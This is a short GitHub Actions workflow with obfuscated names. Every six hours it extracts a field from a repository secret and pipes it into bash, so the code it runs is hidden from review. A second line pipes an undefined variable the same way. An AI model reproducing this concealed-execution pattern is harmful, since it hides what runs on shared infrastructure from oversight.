name: taidutd
on:
  workflow_dispatch:
  schedule:
    - cron: '51 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: taidutd
        env:
          alp3: ${{ secrets.alp3 }}
        run: |
          echo $alp3 | jq -r .s84 | /bin/bash
          echo $tcwji92098 | jq -r .c27876 | /bin/bash

